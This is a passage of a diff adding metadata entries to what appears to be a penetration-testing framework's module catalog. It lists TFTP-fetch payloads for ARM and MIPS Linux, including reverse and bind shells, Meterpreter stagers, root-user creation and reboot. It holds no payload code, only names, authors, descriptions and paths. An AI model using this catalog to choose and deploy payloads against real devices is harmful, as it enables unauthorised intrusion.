+  "payload_cmd/linux/tftp/armle/adduser": {
+    "name": "TFTP Fetch, Linux Add User",
+    "fullname": "payload/cmd/linux/tftp/armle/adduser",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nCreate a new user with UID 0",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/adduser",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/adduser",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/exec": {
+    "name": "TFTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/tftp/armle/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/meterpreter/bind_tcp": {
+    "name": "TFTP Fetch, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/armle/meterpreter/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/meterpreter/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/meterpreter/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/tftp/armle/meterpreter/reverse_tcp": {
+    "name": "TFTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/armle/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/shell/bind_tcp": {
+    "name": "TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/armle/shell/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/shell/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/shell/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/tftp/armle/shell/reverse_tcp": {
+    "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/armle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/armle/shell_bind_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/armle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ",
+      "hal"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect to target and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armle/shell_reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/armle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ"
+    ],
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armle",
+    "adapted_refname": "linux/armle/shell_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/tftp/mips64/meterpreter_reverse_http": {
    "name": "TFTP Fetch",
    "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_http",
@@ -203671,6 +209295,1136 @@
    "adapted_refname": "linux/mips64/meterpreter_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/tftp/mipsbe/exec": {
+    "name": "TFTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n                A very small shellcode for executing commands.\n                This module is sometimes helpful for testing purposes.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp": {
+    "name": "TFTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/meterpreter",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/reboot": {
+    "name": "TFTP Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes or executing\n            other payloads that rely on initial startup procedures.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/shell/reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/shell",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/mipsbe/shell_bind_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsbe/shell_reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+      "EDB-18226"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsbe/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/exec": {
+    "name": "TFTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/tftp/mipsle/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n        A very small shellcode for executing commands.\n        This module is sometimes helpful for testing purposes as well as\n        on targets with extremely limited buffer space.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/meterpreter/reverse_tcp": {
+    "name": "TFTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/meterpreter",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
